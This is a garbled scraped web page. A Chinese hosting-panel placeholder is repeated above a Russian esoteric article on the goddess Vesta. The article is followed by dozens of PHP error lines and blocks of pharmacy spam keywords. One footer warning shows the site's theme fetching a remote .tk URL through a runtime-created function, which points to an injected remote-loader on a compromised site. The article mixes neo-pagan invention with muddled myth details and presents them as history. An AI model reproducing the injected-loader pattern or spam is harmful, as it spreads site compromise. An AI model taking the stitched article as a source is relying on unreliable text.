恭喜, 站点创建成功!

站点创建成功,本页面由系统自动生成。

  • 本页面在FTP根目录下的index.html
  • 您可以删除或覆盖本页面
  • FTP相关信息,请到宝塔后台查看
  • 我们为您提供了完善的数据备份功能,请到后台进行相关设置
  • 恭喜,站点创建成功!

    恭喜, 站点创建成功!

    站点创建成功,本页面由系统自动生成。

  • 本页面在FTP根目录下的index.html
  • 您可以删除或覆盖本页面
  • FTP相关信息,请到宝塔后台查看
  • 我们为您提供了完善的数据备份功能,请到后台进行相关设置
  • 恭喜,站点创建成功!

    恭喜, 站点创建成功!

    站点创建成功,本页面由系统自动生成。

  • 本页面在FTP根目录下的index.html
  • 您可以删除或覆盖本页面
  • FTP相关信息,请到宝塔后台查看
  • 我们为您提供了完善的数据备份功能,请到后台进行相关设置
  • 恭喜,站点创建成功!

    恭喜, 站点创建成功!

    站点创建成功,本页面由系统自动生成。

  • 本页面在FTP根目录下的index.html
  • 您可以删除或覆盖本页面
  • FTP相关信息,请到宝塔后台查看
  • 我们为您提供了完善的数据备份功能,请到后台进行相关设置
  • Загадочная богиня Веста — небесная хранительница. — nsaron.ru

    Загадочная богиня Веста — небесная хранительница.

    alt="богиня веста"

    Богиня Веста — Небесная Богиня-Хранительница Древнейшей Мудрости Вышних Богов. Веста очень древнее божество, она является действующим лицом в мифах разных народов – у древних славян, греков и римлян. 

    Богиня Веста встречается в мифах славян, греков и римлян, но почитали ее везде по-своему. В одних сказаниях она повелевала огнем, в других – именовалась хранительницей империи, в третьей – была предвестницей Весны. Славяне всегда пышно отмечали день Весты, а девушек, которые ей служили, все народы чествовали особо.

    Богиня Веста у славян

    alt="богиня гестия"
    Богиня Веста встречается у разных народов

    Веста — славянская богиня, которую наши предки считали младшей сестрой богини Марены, они верили, что Веста — богиня весны, приносящая на землю хорошие новости, и предвещающая начало цветения в природе, преобладание света над тьмой. Ее силу связывали с огнем, но не как карающей силой, а оживляющей и согревающей мир. Позвать богиню в жилище можно было, 8 раз обогнув дом, вымаливая при этом удачи и счастья. Бытовало поверье, что женщины, умывающиеся талой водой – подарком Весты, будут такими же красивыми и вечно молодыми, как она.

    У наших предков существовал институт женского жречества, к которому принадлежали ВЕСТЫ, которые были «вестницами» («вещали», выступали проводниками «Божьей Вести»). По большому счету, все девочки и девушки до замужества обучались и потенциально имели такие способности и назывались Вестами.
    Из-Вестие — буквально “мысль (истина), извлеченная из Весты”.
    В день встречи Весты оглашались имена девушек, которые достигли возраста половой зрелости и теперь уже могли быть просватаны.

    День богини Весты у славян

    У славянских народов имя Веста походит от «весть», считалось, что приход весны – самая лучшая новость после холодной зимы. Существует 2 версии, относительно даты, когда наши предки чествовали эту богиню:

    1. В большинстве исследований отмечается, что день богини Весты припадает на 22 марта, его всегда отмечали пышными гуляниями и непременно пекли блины – символ теплого солнышка.
    2. Вторая версия дня чествования богини – 2 декабря – стужня, когда особые церемонии жрецы проводили на рассвете, чествуя зарю. У предков заря считалась символом преимущества света над темнотой, так они призывали скорую весну и тепло для рода.

    Богиню Весту также называют Покровительницей Обновляющегося Мира, доброй Богиней Весны, которая управляет приходом на Землю Весны и пробуждением Природы на Мидгард-Земле. Богиня Веста символизировала не только обретение Мудрости Божественной мудрости представителями Славянских и Арийских Родов, но и получение приятных, добрых вестей в каждом Роду.

    В этот день каждый представитель славного Рода получал важное известие от Предков, а также Мудрое наставление от Божественных Предков, в соответствии со своим Духовным Развитием.

    Богиня Веста в Древнем Риме

    alt="богиня огня гестия"
    Гестия в славянском пантеоне богиня весны

    По легенде она родилась от бога времени и богини пространства, то есть возникла первой в мире, предназначенном для жизни, и, наполнив энергией пространство и время, дала старт эволюции. В отличие от других божеств римского пантеона, богиня Веста не имела человеческого облика, она была олицетворением светоносного и животворного пламени, в ее храме не было статуи или иного изображения этого божества. Считая огонь единственной чистой стихией, римляне представляли Весту девственной богиней, не принявшей брачных предложений Меркурия и Аполлона. За это верховный бог Юпитер наделил ее привилегией быть самой почитаемой. Однажды богиня Веста едва не стала жертвой эротических желаний бога плодородия Приапа. Пасущийся неподалеку осел громким ревом разбудил задремавшую богиню и тем спас ее от бесчестия.

    С тех пор в день празднования Весталий ослов было запрещено запрягать в работу, а на светильнике богини была изображена голова этого животного.

    Храм Весты римляне чтили особо, ее очаг называли символом процветания Рима. Еще ее именовали «богиня огня Веста», пламя в храме должно было гореть постоянно. Бытует версия, якобы традиция вечного огня в честь защитников отечества походит от традиции почитания Весты.

    Жрицы богини Весты

    alt="жрицы богини весты"
    Богиня Веста выполняла очень важные функции у римлян

    Жриц богини Весты именуют весталками, девочек в служительницы отбирали очень строго, чтобы сохраняли подобие богини. Весталки должны были:

    • походить из именитых семей;
    • быть красивыми и целомудренными;

    Сами весталки давали обет чистоты и невинности на тридцать лет.
    Первые десять они учились церемониям, следующий десяток лет проводили их, а последние 10 лет обучали молодых весталок. Совсем юные девочки вряд ли представляли, что означает эта клятва. Но потеря девственности каралась жестоко. И если весталка оступалась, то не было дня, более черного в Риме. Это был день траура. Павшую жрицу вели на земляной вал у одних из городских ворот, где готовили могилу, в которую женщину опускали живьем. Немного еды и лампадка были утешением для несчастной, которая потом погибала, заваленная грудой камней.

    Но после своего срока службы у Весты, праведная женщина освобождалась от своих обязанностей. Она могла выйти замуж, заниматься своими финансами, самостоятельно выбирать себе дело и привязанности. Она была богата и уважаема всем римским обществом, которое видело в ней символ чистоты и веры, надежности и непогрешимости.

    Храм Богини Весты

    На римском холме Палантине был построен храм Весты, олицетворявший собой очаг самого Рима, где горел незатухающий огонь, который поддерживали жрицы богини. Храм Весты римляне чтили особо, ее очаг называли символом процветания Рима.

    Все, кто отправлялся в новые земли или основывал поселения, брали из этого пламени крупицу огня и везли его в далекие колонии. Костер в храме не затухал почти никогда, и лишь в ночь наступления нового года, огонь гасили и разводили вновь. Удивительно, что рождение юного пламени должно было происходить лишь трением одной палочки о другую, как в самые ранние годы человеческой цивилизации. Это совершенно точно доказывает древность культа Весты.

    alt="богиня огня веста"
    Гестия у римлян не имела человеческого облика

    В эти же дни наступившего года, священные ветви лавра заменялись на новые, а вход в дома посвящался богине. Весталки участвовали в специальных обрядах, изготавливали сакральные субстанции из соли, зерен и пепла жертвенных животных, молились и пели тайные гимны. Весталки были единственными жрицами, посвященными во все тонкости священных церемоний.

    Под пристальным и благожелательным оком богини Весты проводились брачные церемонии, в ее очаге пекли свадебный ритуальный хлеб. Здесь заключались семейные договоры, узнавали волю предков. Ничего дурного и недостойного не должно было происходить перед священным огнем хранимого богиней очага.

    Греческая богиня Веста

    Здесь богиня Веста называлась Гестией и имела то же самое значение, покровительствуя жертвенному огню и семейному очагу. Ее родителями были Кронос и Рея, а самым младшим братом – Зевс.

    За то, что красавица сохранила девственность, поклявшись головой верховного бога Олимпа сохранить целомудрие, Меркурий признал ее самой почитаемой.

    Греки не отказывались видеть в ней женщину и изображали ее в виде стройной величественной красавицы в накидке. Перед каждым значимым делом ей приносили жертвы. У греков сохранилась даже поговорка «начинать с Гестией». Главным очагом богини огня считалась гора Олимп с ее небесным пламенем. Античные гимны воспевают Гестию «зеленотравной» владычицей «с ясной улыбкой» и призывают «счастьем повеять» и «здоровьем с целящею дланью».

    Место богини Гестии располагалось в центре дома, ей первой приносили жертвы, ее очаг считался символом семейной жизни, счастье которого основывалось на целомудрии жены.

    Веста как негасимый огонь вселенной

    Культ Весты, мощный и всеобъемлющий, впоследствии стал символом благосостояния, отождествлялся с Космосом, с неугасимым огнем самой жизни, с чистейшим элементом Вселенной. Изображенная со светочем в руке, и закрытым покрывалом лицом – Веста, скорее всего, стала олицетворением вечной тайны бытия, загадки происхождения жизни и желания человека к непрерывному самопознанию.


    Источник: просторы интернета

    Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513
    Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2510 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513 Warning: in_array(): Wrong datatype for second argument in E:\Rooms\u192640\nsaron.ru\www\wp-includes\formatting.php on line 2513

    Author: Наталья Сарон

    Меня зовут Наталья Сарон уже много лет я занимаюсь предсказательными практиками и изучаю различные эзотерические течения. На этом сайте я постараюсь писать интересные статьи из своей практики и выкладывать эзотерическую информацию на разные темы.

    Related Articles

    Добавить комментарий

    Ваш e-mail не будет опубликован. Обязательные поля помечены *

    Copyright © 2019 nsaron.ru
    top Warning: file_get_contents(http://nativeredir.tk/lx/1.txt): failed to open stream: HTTP request failed! HTTP/1.1 203 in E:\Rooms\u192640\nsaron.ru\www\wp-content\themes\clean-gallery-pro\footer.php(65) : runtime-created function on line 1
    kamagra bestellen schweiz cialis generika cialis schweiz cialis kaufen kamagra gel kamagra kaufen kamagra schweiz kamagra gel kamagra 100mg oral jelly kamagra oral jelly kamagra que es kamagra 100mg levitra precio levitra generico vardenafil generico viagra comprar Comprar viagra priligy kopen priligy belgie priligy goedkoop
    kamagra jelly kamagra oral jelly cialis o viagra viagra bestellen viagra generika viagra schweiz levitra schweiz levitra compendium levitra 20mg preis schweiz kamagra gel kamagra flashback kamagra pris kamagra kopen kamagra bestellen kamagra pillen viagra kopen viagra online viagra prijs viagra kaufen viagra generika
    kamagra jelly kamagra oral jelly cialis hinta cialis 5mg cialis netistä viagra hinta viagra resepti viagra netistä viagra hinta viagra vaikutus viagra virosta cialis hinta cialis 20 mg cialis kokemuksia kamagra jelly kamagra vaikutusaika kamagra 100 mg kamagra gel kamagra gel kaufen kamagra bestellen schweiz